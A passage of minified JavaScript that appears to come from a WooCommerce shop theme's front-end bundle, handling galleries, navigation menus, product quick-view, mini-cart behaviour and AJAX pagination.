u)i.style[e]=u[e];l&&l.call(o,o),s&&s.resolver(o)},V(i,c,a)}}),B.each(["In","Out"],function(e,c){V.Sequences["fade"+c]=function(e,t,i,n,o,s){var a=B.extend({},t),r={opacity:"In"===c?1:0},l=a.complete;a.complete=i!==n-1?a.begin=null:function(){l&&l.call(o,o),s&&s.resolver(o)},a.display===R&&(a.display="In"===c?"auto":"none"),V(this,r,a)}}),V}jQuery.fn.velocity=jQuery.fn.animate}(window.jQuery||window.Zepto||window,window,document)}),jQuery(document).ready(function(i){var e,n=(e=0,function(){return e++});i(".wp-block-gallery").each(function(){var t=i(this);t.attr("id","gallery-"+n()),t.find(".blocks-gallery-item").each(function(){var e=i(this);i(this).find("a").addClass("fresco"),e.find(".fresco").attr("data-fresco-group",t.attr("id")),0<e.find("figcaption").length&&e.find(".fresco").attr("data-fresco-caption",e.find("figcaption").text())})}),i(".wp-block-getbowtied-slider").each(function(){0==i(this).find(".swiper-wrapper").children("div.swiper-slide").length&&i(this).remove()})}),jQuery(document).ready(function(r){function e(e){var t=r(e).attr("data-src");r(e).one("load",function(){}).each(function(){r(e).attr("src",t),r(e).css("opacity","1")})}function o(){return 1024<r(window).innerWidth()?(l=3,r(".blog-isotop-container").css({margin:"0 -1.5%"})):r(window).innerWidth()<=640?(l=1,r(".blog-isotop-container").css({margin:"0 -30px"})):(l=2,r(".blog-isotop-container").css({margin:"0 -1.5%"})),0<(a=r(".blog-isotop-container").width())%l&&(a+=l-a%l),r(".blog-isotope").css("width",a),l}function s(){return d=1584<r(window).innerWidth()?5:r(window).innerWidth()<=480?1:r(window).innerWidth()<=901?2:r(window).innerWidth()<=1248?3:4,0<r(".items_per_row_3").length&&1248<r(window).innerWidth()&&(d=3),0<r(".items_per_row_4").length&&1584<r(window).innerWidth()&&(d=4),0<(u=r(".portfolio-isotope-container").width())%d&&(u+=d-u%d),r(".portfolio-isotope").css("width",u),d}r(window).innerWidth();r(".main-navigation > ul > .menu-item").mouseenter(function(){if(0<r(this).children(".sub-menu").length){var e=r(this).children(".sub-menu"),t=parseInt(r(window).outerWidth())-parseInt(e.outerWidth())-parseInt(e.offset().left);t<0&&e.css("left",t-30+"px")}}),r(".woocommerce-tabs .panel:first-child").addClass("current"),r(".woocommerce-tabs ul.tabs li a").off("click").on("click",function(){var e=r(this),t=e.attr("href");return e.parent().siblings().removeClass("active").end().addClass("active"),r(".woocommerce-tabs").find(t).siblings(".panel").filter(":visible").fadeOut(500,function(){r(".woocommerce-tabs").find(t).siblings(".panel").removeClass("current"),r(".woocommerce-tabs").find(t).addClass("current").fadeIn(500)}),!1}),r(document).on("click",".site-search .close-button",function(){r(document).find("#offCanvasTop1").removeAttr("style")}),r(".add_to_cart_button").one("click",function(){var t,i,e=r(this);t=(t=e.attr("class")).replace("add_to_cart_button",""),i=e.attr("style"),e.parent().on("DOMNodeInserted",function(e){e.stopPropagation(),r(e.target).is(".added_to_cart")&&(r(e.target).addClass(t).removeClass("added_to_cart").addClass("added_to_cart_button"),r(e.target).attr("style",i))})}),r.fn.visible=function(e){var t=r(this),i=r(window),n=i.scrollTop(),o=n+i.height(),s=t.offset().top,a=s+t.height();return(!0===e?s:a)<=o&&n<=(!0===e?a:s)},r("section.related").each(function(e,t){r(t).visible(!0)&&r(t).addClass("on_screen")}),r(".nano").nanoScroller(),r(".mobile-navigation .menu-item-has-children .sub-menu").before('<div class="more"><span class="spk-icon-down-small"></span></div>'),r(".mobile-navigation").on("click",".more",function(e){e.stopPropagation();var t=r(this).parent().find(".sub-menu");r.each(t,function(e,t){r(t).find(".sub-menu").addClass("open"),r(t).find(".more").remove()}),r(this).parent().toggleClass("current").children(".sub-menu").toggleClass("open"),r(this).parent().find(".more").html('<span class="spk-icon-down-small"></span>'==r(this).parent().find(".more").html()?'<span class="spk-icon-up-small"></span>':'<span class="spk-icon-down-small"></span>'),r(".nano").nanoScroller()}),r(".mobile-navigation").on("click","a",function(e){"#"==r(this).attr("href")&&r(this).parent(".menu-item").hasClass("menu-item-has-children")?r(this).parent().find(".more").trigger("click"):-1<r(this).attr("href").indexOf("#")&&r("#offCanvasRight1").foundation("close")}),r("#products-grid li img").each(function(){e(this)}),r(".related.products li img").each(function(){e(this)}),r(".upsells.products li img").each(function(){e(this)}),r(".add_to_cart_button").on("click",function(){r(this).parents("li.animate").addClass("product_added_to_cart")}),r(".woocommerce-review-link").off("click").on("click",function(){r(".tabs li a").each(function(){"#tab-reviews"==r(this).attr("href")&&r(this).trigger("click")});var e=0;0<r("#wpadminbar").length&&(e+=r("#wpadminbar").outerHeight()),0<r(".getbowtied_theme_explorer_wrapper").length&&r(".getbowtied_theme_explorer_wrapper").is("visible")&&(e+=r(".getbowtied_theme_explorer_wrapper").outerHeight());var t=r(".woocommerce-tabs").offset().top-e;return r("html, body").animate({scrollTop:t},1e3),!1}),r(".add_to_wishlist").on("click",function(){r(this).parents(".yith-wcwl-add-button").addClass("show_overlay")}),r(".account-tab-list").on("click",".account-tab-link",function(){if(r(".account-tab-link").hasClass("registration_disabled"))return!1;var e=r(this),t=e.attr("href");return e.parent().siblings().find(".account-tab-link").removeClass("current"),e.addClass("current"),r(".account-forms").find(r(t)).siblings().stop().fadeOut(function(){r(".account-forms").find(r(t)).fadeIn()}),!1}),r(".account-tab-link-register").on("click",function(){return r(".login-form").stop().fadeOut(function(){r(".register-form").fadeIn()}),!1}),r(".account-tab-link-login").on("click",function(){return r(".register-form").stop().fadeOut(function(){r(".login-form").fadeIn()}),!1});var t,i;r(window).width();if(1!=getbowtied_scripts_vars.product_lightbox&&1!=getbowtied_scripts_vars.product_gallery_zoom&&(r(".product_layout_classic .woocommerce-product-gallery__wrapper .woocommerce-product-gallery__image a").css({cursor:"default"}),r(".product_layout_2 .product-images-wrapper .product-image a img").css({cursor:"default"}),r(".product_layout_3 .product-images-wrapper .product-image a img").css({cursor:"default"}),r(".product_layout_4 .product-images-wrapper .product-image a img").css({cursor:"default"})),1==getbowtied_scripts_vars.product_lightbox&&1!=getbowtied_scripts_vars.product_gallery_zoom&&r(".product_layout_4 .product-images-wrapper .product-image a img").css({cursor:"pointer"}),1!=getbowtied_scripts_vars.product_lightbox&&r(".product-images-layout .fresco, .product-images-layout-mobile .fresco, .woocommerce-product-gallery__wrapper .fresco").on("click",function(){return!1}),r(".gallery").each(function(){var t=r(this);t.find(".gallery-item").each(function(){var e=r(this);e.find(".fresco").attr("data-fresco-group",t.attr("id")),0<e.find(".gallery-caption").length&&e.find(".fresco").attr("data-fresco-caption",e.find(".gallery-caption").text())})}),1023<r(window).innerWidth()&&r(".orderby, .big-select").select2({allowClear:!0,minimumResultsForSearch:1/0}),r(".gallery-item").each(function(){var e=r(this);0<e.find(".gallery-caption").length&&e.append('<span class="gallery-caption-trigger">i</span>')}),r(".gallery-caption-trigger").on("mouseenter",function(){r(this).siblings(".gallery-caption").addClass("show")}),r(".gallery-caption-trigger").on("mouseleave",function(){r(this).siblings(".gallery-caption").removeClass("show")}),r(".trigger-footer-widget").on("click",function(){var e=r(this).parent();e.fadeOut("1000",function(){e.remove(),r(".site-footer-widget-area").fadeIn()})}),r(".blog-isotop-container").length){var n,a,l;h=r(".filters-group .is-checked").attr("data-filter"),l=o(),o();var c=function(){setTimeout(function(){r(".blog-post").removeClass("hidden")},200)};(t=imagesLoaded(r(".blog-isotope"))).on("done",function(){n=r(".blog-isotope").isotope({itemSelector:".blog-post",masonry:{columnWidth:".grid-sizer"}}),c()}),t.on("fail",function(){n=r(".blog-isotope").isotope({itemSelector:".blog-post",masonry:{columnWidth:".grid-sizer"}}),c()}),r(".filters-group").on("click","filter-item",function(){h=r(this).attr("data-filter"),n.isotope({filter:h})})}if(r(".hover-effect-text").each(function(){var e=r(this);e.css("bottom",-e.outerHeight()).attr("data-height",e.outerHeight())}),r(".hover-effect-link").mouseenter(function(){var e=r(this);if(!e.find(".hover-effect-text").is(":empty")){var t=e.find(".hover-effect-text").outerHeight();e.find(".hover-effect-title").css("bottom",t),e.find(".hover-effect-text").css("bottom",0)}}),r(".hover-effect-link").mouseleave(function(){var e=r(this);if(!e.find(".hover-effect-text").is(":empty")){var t=e.find(".hover-effect-text").attr("data-height");e.find(".hover-effect-title").css("bottom",28),e.find(".hover-effect-text").css("bottom",-t)}}),r(".portfolio-isotope-container").length){var u,d,h;h=r(".filters-group .is-checked").attr("data-filter"),d=s(),s();var p=function(){setTimeout(function(){r(".portfolio-box").removeClass("hidden")},200)};(i=imagesLoaded(r(".portfolio-isotope"))).on("done",function(){r(".portfolio-isotope").isotope({itemSelector:".portfolio-box",masonry:{columnWidth:".portfolio-grid-sizer"}}),p()}),i.on("fail",function(){portfolio_wrapper_inner=r(".portfolio-isotope").isotope({itemSelector:".portfolio-box",masonry:{columnWidth:".portfolio-grid-sizer"}}),p()}),r(".filters-group").on("click",".filter-item",function(){h=r(this).attr("data-filter"),r(this).parents(".portfolio-filters").siblings(".portfolio-isotope").isotope({filter:h})})}if(r(".topbar-language-switcher").change(function(){window.location=r(this).val()}),r(window).load(function(){setTimeout(function(){r(".product_thumbnail.with_second_image").css("background-size","cover"),r(".product_thumbnail.with_second_image").addClass("second_image_loaded")},300),1024<r(window).outerWidth()&&r.stellar({horizontalScrolling:!1,responsive:!0}),setTimeout(function(){r(".parallax, .single-post-header-bkg").addClass("loaded")},150)}),r(window).resize(function(){function e(){n&&clearTimeout(n),n=setTimeout(function(){r(this).trigger("onEndResizingIsotope")},100)}var t,i;(r(".site-search-form-wrapper-inner, .site-search .widget_search .search-form").css("margin-left",-r(window).width()/4),r(".main-navigation > ul > .menu-item > .sub-menu").css("left","-15px"),r(".blog-isotop-container").length)&&(o(),t=o(),l!=t&&(r(".filters-group .filter-item").each(function(){r(this).attr("data-filter")==h&&r(this).trigger("click")}),l=t,e()));r(".portfolio-isotope-container").length&&(s(),i=s(),d!=i&&(r(".filters-group .filter-item").each(function(){r(this).attr("data-filter")==h&&r(this).trigger("click")}),d=i,e()));var n=this.resizeTO}),r(window).bind("onEndResizingIsotope",function(){r(".filters-group .filter-item").each(function(){r(this).attr("data-filter")==h&&r(this).trigger("click")})}),r(window).scroll(function(){0<r(this).scrollTop()?r("#page_wrapper.sticky_header .top-headers-wrapper").addClass("on_page_scroll"):r("#page_wrapper.sticky_header .top-headers-wrapper").removeClass("on_page_scroll"),640<r(window).innerWidth()&&r(".products li").each(function(e,t){r(t).visible(!0)&&r(t).addClass("animate")}),r("section.related, #site-footer").each(function(e,t){r(t).visible(!0)?r(t).addClass("on_screen"):r(t).removeClass("on_screen")}),1024<r(window).width()&&r(".single-post-header-overlay").css("opacity",.3+r(window).scrollTop()/(1.4*r(window).height()))}),r("body").hasClass("woocommerce-wishlist")&&r("td.wishlist-empty").length&&r("h1.page-title").hide(),r(".widget_layered_nav span.count, .widget_product_categories span.count").each(function(){var e=r(this).html();e=e.substring(1,e.length-1),r(this).html(e)}),r(".widget_rating_filter ul li a").each(function(){var e=r(this).contents().filter(function(){return 3==this.nodeType})[0].nodeValue;r(this).contents().filter(function(){return 3==this.nodeType})[0].nodeValue="",e=e.slice(2,-1),r(this).append('<span class="count">'+e+"</span>")}),0<"form#register".length){var f=window.location.hash;f&&(r(".account-tab-link").removeClass("current"),r('a[href="'+f+'"]').addClass("current"),f=f.substring(1),r(".account-forms > form").hide(),r("form#"+f).show())}var m=r(".cd-top");r(window).scroll(function(){300<r(this).scrollTop()?m.addClass("cd-is-visible"):m.removeClass("cd-is-visible cd-fade-out"),1200<r(this).scrollTop()&&m.addClass("cd-fade-out")}),m.on("click",function(e){e.preventDefault(),r("body,html").animate({scrollTop:0},700)})}),jQuery(function(t){"use strict";var e=t(".cd-top");t(window).scroll(function(){300<t(this).scrollTop()?e.addClass("cd-is-visible"):e.removeClass("cd-is-visible cd-fade-out"),1200<t(this).scrollTop()&&e.addClass("cd-fade-out")}),e.on("click",function(e){e.preventDefault(),t("body,html").animate({scrollTop:0},700)})}),jQuery(document).ready(function(t){function e(){var e=t('[data-vc-full-width="true"]');t.each(e,function(){var e=jQuery(this);e.css("right",e.css("left")).css("left","")})}t("body").hasClass("rtl")&&t(document).on("vc-full-width-row",function(){e()}),t("body").hasClass("rtl")&&e(),0<t(".blog-sidebar").length&&t(".blog-sidebar").height()>t(".blog-isotop-container").height()&&t(".blog-isotop-container").height(t(".blog-sidebar").height()+100),t(window).resize(function(){0<t(".blog-sidebar").length&&t(".blog-sidebar").height()>t(".blog-isotop-container").height()&&t(".blog-isotop-container").height(t(".blog-sidebar").height()+100)}),t(document).on("focus",".woocommerce-cart #content table.cart td.actions .coupon #coupon_code",function(){t(".woocommerce-cart #content table.cart td.actions .coupon").addClass("focus")}),t(document).on("focusout",".woocommerce-cart #content table.cart td.actions .coupon #coupon_code",function(){t(".woocommerce-cart #content table.cart td.actions .coupon").removeClass("focus")}),t(document).on("focus","form.checkout_coupon #coupon_code",function(){t("form.checkout_coupon .checkout_coupon_inner").addClass("focus")}),t(document).on("focusout","form.checkout_coupon #coupon_code",function(){t("form.checkout_coupon .checkout_coupon_inner").removeClass("focus")}),0<t("#wpadminbar").length&&t(window).width()<=1024&&t(".st-menu").css("top","32px")}),jQuery(document).ready(function(i){i(window).load(function(){i(".vc_images_carousel").each(function(){var e=i(this).find(".vc_item.vc_active").height();i(this).css("height",e)})}),i(".vc_images_carousel").on("click",".vc_right, .vc_left, .vc_carousel-indicators li",function(){var t=i(this);setTimeout(function(){var e=t.parents(".vc_images_carousel").find(".vc_item.vc_active").height();t.parents(".vc_images_carousel").css("height",e)},600)})}),jQuery(function(t){t(document).on("click touchend","header .site-tools .search-button .spk-icon-search",function(){setTimeout(function(){t(".off-canvas .woocommerce-product-search .search-field").focus()},800)}),t(document).keyup(function(e){"27"==e.which&&t(".off-canvas").length&&t(".off-canvas").hasClass("is-open")&&t(".off-canvas").foundation("close")})}),jQuery(function(e){var t=e(window).height(),i=e(".shopkeeper-mini-cart .widget.woocommerce.widget_shopping_cart .widget_shopping_cart_content .cart_list.product_list_widget li.mini_cart_item .product-item-bg");768==t?i.addClass("smaller-vh"):i.removeClass("smaller-vh"),e("#fbmsg").length&&(e(".getbowtied_get_this_theme").length?e("#fbmsg").addClass("gbt_plugin_installed"):e("#fbmsg").removeClass("gbt_plugin_installed"))}),jQuery(function(e){"use strict";e("body.single-product form.cart").on("change","input.qty, input.custom-qty",function(){e("button.single_add_to_cart_button.ajax_add_to_cart").data("quantity",this.value)}),e('.cd-quick-view form.cart input[name="quantity"]').trigger("change")}),jQuery(function(i){i("button.single_add_to_cart_button.ajax_add_to_cart.progress-btn").on("click",function(e){var t=i(this);t.hasClass("active")||(t.addClass("active"),setTimeout(function(){t.addClass("check")},3e3),setTimeout(function(){t.removeClass("active"),t.removeClass("check")},5e3))})}),jQuery(document).foundation(),jQuery(function(n){"use strict";var o={init:function(){if("load_more_button"!=getbowtied_scripts_vars.pagination_blog&&"infinite_scroll"!=getbowtied_scripts_vars.pagination_blog||(n(document).ready(function(){n(".posts-navigation").length&&(n(".posts-navigation").before('<div class="getbowtied_blog_ajax_load_button"><a getbowtied_blog_ajax_load_more_processing="0">'+getbowtied_scripts_vars.ajax_load_more_locale+"</a></div>"),"infinite_scroll"==getbowtied_scripts_vars.pagination_blog&&n(".getbowtied_blog_ajax_load_button").addClass("getbowtied_blog_ajax_load_more_hidden"),0==n(".posts-navigation a.next").length&&n(".getbowtied_blog_ajax_load_button").addClass("getbowtied_blog_ajax_load_more_hidden")),n(".posts-navigation").hide(),n(".blog-posts > .blog-post").addClass("getbowtied_blog_ajax_load_more_item_visible")}),n("body").on("click",".getbowtied_blog_ajax_load_button a",function(e){if(e.preventDefault(),n(".posts-navigation a.next").length){n(".getbowtied_blog_ajax_load_button a").attr("getbowtied_blog_ajax_load_more_processing",1);var t=n(".posts-navigation a.next").attr("href");o.onstart(),n(".getbowtied_blog_ajax_load_button").fadeOut(200,function(){n(".posts-navigation").before('<div class="getbowtied_blog_ajax_load_more_loader"><span>'+getbowtied_scripts_vars.ajax_loading_locale+"</span></div>")}),n.get(t,function(e){n(".posts-navigation").html(n(e).find(".posts-navigation").html());var i=0;n(e).find(".blog-posts > .blog-post").each(function(){if("layout-1"==getbowtied_scripts_vars.layout_blog){i++,n(this).addClass("loaded delay-"+i);var e=document.querySelector("#masonry_grid"),t=document.createElement("li");salvattore.appendElements(e,[t]),t.outerHTML=n(this).prop("outerHTML")}else i++,n(this).addClass("loaded delay-"+i),n(".blog-posts > .blog-post:last").after(n(this))}),n(".getbowtied_blog_ajax_load_more_loader").fadeOut(200,function(){n(this).remove(),n(".getbowtied_blog_ajax_load_button").show(),n(".getbowtied_blog_ajax_load_button a").attr("getbowtied_blog_ajax_load_more_processing",0)}),o.onfinish(),0==n(".posts-navigation a.next").length&&(n(".getbowtied_blog_ajax_load_button").addClass("finished").removeClass("getbowtied_blog_ajax_load_more_hidden"),n(".getbowtied_blog_ajax_load_button a").show().html(getbowtied_scripts_vars.ajax_no_more_items_locale).addClass("disabled"))})}else n(".getbowtied_blog_ajax_load_button").addClass("finished").removeClass("getbowtied_blog_ajax_load_more_hidden"),n(".getbowtied_blog_ajax_load_button a").show().html(getbowtied_scripts_vars.ajax_no_more_items_locale).addClass("disabled")})),"infinite_scroll"==getbowtied_scripts_vars.pagination_blog){var e=Math.abs(0);n(window).scroll(function(){n(".blog-posts").length&&(n(".blog-posts").offset().top+n(".blog-posts").outerHeight()-n(window).scrollTop()-e<n(window).height()&&0==n(".getbowtied_blog_ajax_load_button a").attr("getbowtied_blog_ajax_load_more_processing")&&n(".getbowtied_blog_ajax_load_button a").trigger("click"))})}},onstart:function(){},onfinish:function(){}};(function(){n(window).load(function(){n("#masonry_grid").addClass("fade-in")})})(),n("body").hasClass("search")||(o.init(),o.onfinish())}),jQuery(document).ready(function(s){var e=s(".custom-layout .mobile_gallery .woocommerce-product-gallery").attr("class"),t=s(".custom-layout .mobile_gallery .flex-control-thumbs").attr("class");s(window).on("resize",function(){s(window).width()<1024?(s(".custom-layout .mobile_gallery > div").addClass(e),s(".custom-layout .mobile_gallery ol").addClass(t)):(s(".custom-layout .mobile_gallery .woocommerce-product-gallery").removeClass(e),s(".custom-layout .mobile_gallery .flex-control-thumbs").removeClass(t))}),s(window).load(function(){1024<s(window).width()&&(s(".custom-layout .mobile_gallery .woocommerce-product-gallery").removeClass(e),s(".custom-layout .mobile_gallery .flex-control-thumbs").removeClass(t))}),1==getbowtied_scripts_vars.product_lightbox&&s(".product_layout_classic .woocommerce-product-gallery__wrapper .woocommerce-product-gallery__image").each(function(){var e=s(this);s(this).attr("id","product-gallery"),s(this).find("a").addClass("fresco"),s(this).find(".fresco").attr("data-fresco-group",e.attr("id")),s(this).find(".fresco").attr("data-fresco-group-options","overflow: true, thumbnails: 'vertical', onClick: 'close'"),s(this).find(".fresco").hasClass("video")||0<s(this).find(".fresco img").attr("data-caption").length&&s(this).find(".fresco").attr("data-fresco-caption",s(this).find(".fresco img").attr("data-caption"))}),s(".easyzoom").on("click",".easyzoom-flyout",function(){640<s(window).width()&&s(this).siblings(".fresco.zoom").trigger("click")}),s(".product_layout_classic").on("click",".zoomImg",function(){640<s(window).width()&&s(this).siblings(".fresco").trigger("click")}),s(".woocommerce-product-gallery__image a").on("click",function(e){1!=getbowtied_scripts_vars.product_gallery_zoom&&s(window).width()<640&&(e.stopPropagation(),e.preventDefault())}),s(".product_layout_classic").on("click",".woocommerce-product-gallery__image.flex-active-slide a",function(e){1!=getbowtied_scripts_vars.product_lightbox&&1!=getbowtied_scripts_vars.product_gallery_zoom?(e.stopPropagation(),e.preventDefault()):s(window).width()<640&&(e.stopPropagation(),e.preventDefault())}),s(".product_layout_classic").on("click",".woocommerce-product-gallery__image.flex-active-slide a",function(e){1!=getbowtied_scripts_vars.product_lightbox&&(e.stopPropagation(),e.preventDefault())}),s(".product_layout_classic ").on("hover",".woocommerce-product-gallery__image.flex-active-slide a",function(e){1!=getbowtied_scripts_vars.product_lightbox&&s(this).css("cursor","default")}),s(document).on("click touchend",".product_layout_classic ol.flex-control-thumbs li img",function(){var e,t,i,n,o;640<s(window).width()&&(e=s("ol.flex-control-thumbs"),t=e.find("li"),i=e.height(),n=t.outerHeight(),s(".woocommerce-product-gallery__wrapper"),o=s(".woocommerce-product-gallery__wrapper .woocommerce-product-gallery__image.flex-active-slide").index()*n-(i-n)/2-10,e.animate({scrollTop:o},300))})}),jQuery(document).ready(function(p){function e(){var e=(p(window).width()-p(".cd-quick-view").width())/2,t=(p(window).height()-p(".cd-quick-view").height())/2;p(".cd-quick-view").css({top:t,left:e})}function t(e,t){p(".cd-close");var i,n,o,s,a,r=p(".empty-box").find("img");!p(".cd-quick-view").hasClass("velocity-animating")&&p(".cd-quick-view").hasClass("add-content")?l(r,e,t,"close"):(n=(i=r).parents("li"),o=i.offset().top-p(window).scrollTop(),s=i.offset().left,a=i.width(),p("body").removeClass("overlay-layer"),n.removeClass("empty-box"),p(".cd-quick-view").velocity("stop").removeClass("add-content animate-width is-visible").css({top:o,left:s,width:a}))}function l(e,t,i,n){var o=e.parents("li"),s=e.offset().top-p(window).scrollTop(),a=e.offset().left,r=e.width(),l=(e.height(),p(window).width()),c=(l-t)/2,u=(p(window).height()-596)/2,d=.8*l<i?.8*l:i,h=(l-d)/2;"open"==n?(p("body").addClass("overlay-layer"),o.addClass("empty-box"),p(".cd-quick-view").css({top:s,left:a,width:r,height:596}).velocity({top:u+"px",left:c+"px",width:t+"px"},1e3,[400,20],function(){p(".cd-quick-view").addClass("animate-width").velocity({left:h+"px",width:d+"px"},300,"ease",function(){p(".cd-quick-view").addClass("add-content");var e=".swiper-button-next",t=".swiper-button-prev";p("body").hasClass("rtl")&&(e=".swiper-button-prev",t=".swiper-button-next");var i=new Swiper(".cd-quick-view .swiper-container",{pagination:".swiper-pagination",nextButton:e,prevButton:t,preventClick:!0,preventClicksPropagation:!0,grabCursor:!0,onTouchStart:function(){f=!1},onTouchMove:function(){f=!1},onTouchEnd:function(){setTimeout(function(){f=!0},300)}}),n=p(".cd-quick-view").find(".variations_form"),o=p(".cd-quick-view").find(".variations_form .variations select");n.wc_variation_form(),o.change(),n.on("change","select",function(){i.slideTo(0)})})}).addClass("is-visible")):p(".cd-quick-view").removeClass("add-content").velocity({top:u+"px",left:c+"px",width:t+"px"},300,"ease",function(){p("body").removeClass("overlay-layer"),p(".cd-quick-view").removeClass("animate-width").velocity({top:s,left:a,width:r},500,"ease",function(){p(".cd-quick-view").removeClass("is-visible"),o.removeClass("empty-box")})})}var f=!0;p(document).on("click",".getbowtied_product_quick_view_button",function(e){e.preventDefault();var t=p(this);t.parent().find(".product_thumbnail").addClass("loading");var i=p(this).data("product_id"),n=p(this).parents("li").find(".product_thumbnail img");p.ajax({url:shopkeeper_ajaxurl,data:{action:"getbowtied_product_quick_view",product_id:i},success:function(e){p(".cd-quick-view").empty().html(e),l(n,480,960,"open"),p(".cd-quick-view .product_infos .woocommerce-product-details__short-description").outerHeight()>=p(".cd-quick-view").outerHeight()?p(".cd-quick-view").find(".cd-close").css("right","40px"):p(".cd-quick-view").find(".cd-close").css("right","28px"),p(".cd-quick-view form.cart").on("change","input.qty, input.custom-qty",function(){p(".cd-quick-view button.single_add_to_cart_button.ajax_add_to_cart").data("quantity",this.value)}),p('.cd-quick-view form.cart input[name="quantity"]').trigger("change"),p(".cd-quick-view button.single_add_to_cart_button.ajax_add_to_cart.progress-btn").on("click",function(e){var t=p(this);t.hasClass("active")||(t.addClass("active"),setTimeout(function(){t.addClass("check")},3e3),setTimeout(function(){t.removeClass("active"),t.removeClass("check")},5e3))})},error:function(e){console.log(e)}}).done(function(){t.parent().find(".product_thumbnail").removeClass("loading")})}),p("body").on("click",function(e){(p(e.target).is(".cd-close")||p(e.target).is("body.overlay-layer"))&&!0===f&&t(480,960)}),p(document).keyup(function(e){"27"==e.which&&p(".cd-quick-view").hasClass("is-visible")&&t(480,960)}),p(window).on("resize",function(){p(".cd-quick-view").hasClass("is-visible")&&window.requestAnimationFrame(e)})}),jQuery(document).ready(function(i){function t(){var e=0;i("#wpadminbar").length&&(e+=i("#wpadminbar").height()),i(".top-headers-wrapper").length&&(e+=i(".top-headers-wrapper").height()),i("header").length&&i("header").hasClass("menu-under")&&i(".menu-under .main-navigation").length&&(e-=i(".main-navigation").height()),0<e&&i(".shopkeeper-mini-cart").css("top",e)}function n(){i("body").hasClass("gbt_custom_notif")&&i(".page-notifications .notification").each(function(e){i(this).addClass("fade-out");var t=i(this);setTimeout(function(){t.css("display","none")},500,t)})}1==getbowtied_scripts_vars.option_minicart&&1==getbowtied_scripts_vars.option_minicart_open&&(i("body").on("click",".shopping-bag-button .tools_button, .product_notification_wrapper",function(e){n(),1024<=i(window).width()&&(t(),e.preventDefault(),i(".shopkeeper-mini-cart").toggleClass("open")),e.stopPropagation()}),i("body").on("click",function(e){i(".shopkeeper-mini-cart").hasClass("open")&&(i(e.target).is(".shopkeeper-mini-cart")||i(e.target).is(".shopping-bags-button .tools-button")||i(e.target).is(".woocommerce-message")||0!==i(".shopkeeper-mini-cart").has(e.target).length||i(".shopkeeper-mini-cart").removeClass("open"))}));var o=null,s=null;1==getbowtied_scripts_vars.option_minicart&&2==getbowtied_scripts_vars.option_minicart_open&&(i(".shopping-bag-button").hover(function(e){i(".shopkeeper-mini-cart").hasClass("open")||o||(o=window.setTimeout(function(){o=null,n(),1024<=i(window).width()&&(t(),e.preventDefault(),i(".shopkeeper-mini-cart").addClass("open")),e.stopPropagation()},350))}),i(".shopping-bag-button, .shopkeeper-mini-cart").hover(function(e){s&&(window.clearTimeout(s),s=null)},function(e){s||(s=window.setTimeout(function(){s=null,1024<=i(window).width()&&i(".shopkeeper-mini-cart").hasClass("open")&&i(".shopkeeper-mini-cart").removeClass("open")},500)),o&&(window.clearTimeout(o),o=null)})),t()}),jQuery(function(i){"use strict";var n={init:function(){if("load_more_button"!=getbowtied_scripts_vars.shop_pagination_type&&"infinite_scroll"!=getbowtied_scripts_vars.shop_pagination_type||(i(document).ready(function(){i(".woocommerce-pagination").length&&i("body").hasClass("archive")&&(i(".woocommerce-pagination").before('<div class="getbowtied_ajax_load_button"><a getbowtied_ajax_load_more_processing="0">'+getbowtied_scripts_vars.ajax_load_more_locale+"</a></div>"),"infinite_scroll"==getbowtied_scripts_vars.shop_pagination_type&&i(".getbowtied_ajax_load_button").addClass("getbowtied_ajax_load_more_hidden"),0==i(".woocommerce-pagination a.next").length&&i(".getbowtied_ajax_load_button").addClass("getbowtied_ajax_load_more_hidden"),i(".woocommerce-pagination").hide())}),i("body").on("click",".getbowtied_ajax_load_button a",function(e){if(e.preventDefault(),i(".woocommerce-pagination a.next").length){i(".getbowtied_ajax_load_button a").attr("getbowtied_ajax_load_more_processing",1);var t=i(".woocommerce-pagination a.next").attr("href");n.onstart(),i(".getbowtied_ajax_load_button").fadeOut(200,function(){i(".woocommerce-pagination").before('<div class="getbowtied_ajax_load_more_loader"><span>'+getbowtied_scripts_vars.ajax_loading_locale+"</span></div>")}),i.get(t,function(e){i(".woocommerce-pagination").html(i(e).find(".woocommerce-pagination").html());var t=0;i(e).find(".content-area ul.products li").each(function(){t++,i(this).find(".product_thumbnail.with_second_image").css("background-size","cover"),i(this).find(".product_thumbnail.with_second_image").addClass("second_image_loaded"),i(this).addClass("ajax-loaded delay-"+t),i(".content-area ul.products li:last").after(i(this))}),i(".getbowtied_ajax_load_more_loader").fadeOut(200,function(){i(".getbowtied_ajax_load_button").fadeIn(200),i(".getbowtied_ajax_load_button a").attr("getbowtied_ajax_load_more_processing",0)}),n.onfinish(),setTimeout(function(){i(".content-area ul.products li.hidden").removeClass("hidden").addClass("animate")},500),0==i(".woocommerce-pagination a.next").length&&(i(".getbowtied_ajax_load_button").addClass("finished").removeClass("getbowtied_ajax_load_more_hidden"),i(".getbowtied_ajax_load_button a").show().html(getbowtied_scripts_vars.ajax_no_more_items_locale).addClass("disabled"))})}else i(".getbowtied_ajax_load_button").addClass("finished").removeClass("getbowtied_ajax_load_more_hidden"),i(".getbowtied_ajax_load_button a").show().html(getbowtied_scripts_vars.ajax_no_more_items_locale).addClass("disabled")})),"infinite_scroll"==getbowtied_scripts_vars.shop_pagination_type){var e=Math.abs(0);i(window).scroll(function(){i(".content-area ul.products").length&&(i(".content-area ul.products").offset().top+i(".content-area ul.products").outerHeight()-i(window).scrollTop()-e<i(window).height()&&0==i(".getbowtied_ajax_load_button a").attr("getbowtied_ajax_load_more_processing")&&i(".getbowtied_ajax_load_button a").trigger("click"))})}},onstart:function(){},onfinish:function(){}};n.init(),n.onfinish()}),jQuery(document).ready(function(t){"use strict";t(window).load(function(){if(t(".easyzoom").length)if(1024<t(window).width()){var e=t(".easyzoom").easyZoom({loadingNotice:"",errorNotice:"",preventClicks:!1,linkAttribute:"href"}).data("easyZoom");t(".variations").on("change","select",function(){e.teardown(),e._init()})}else t(".easyzoom a").click(function(e){e.preventDefault()})})}),jQuery(document).ready(function(i){"use strict";var n=i(".product-images-controller"),t=i(".product-images-style-2 .product_images .product-image:not(.mobile), .product-images-style-3 .product_images .product-image:not(.mobile)"),o=i(".product-images-style-2 .product-images-controller li a span.dot, .product-images-style-3 .product-images-controller li a span.dot"),e=i(".product-images-wrapper"),s=i(".site-header.sticky").outerHeight();0<i(".product_layout_2").length&&i(".product_layout_2 .product-images-controller").css("top",e.offset().top);i(window).scroll(function(){o.addClass("current"),t.each(function(){var e=i(this),t=i(' a[href="#'+e.attr("id")+'"]').data("number");e.offset().top+e.outerHeight()<=n.offset().top-s?(o.removeClass("current"),o.eq(t).addClass("current")):o.eq(t).removeClass("current")});var e=i(".product_layout_2 .fluid-width-video-wrapper, 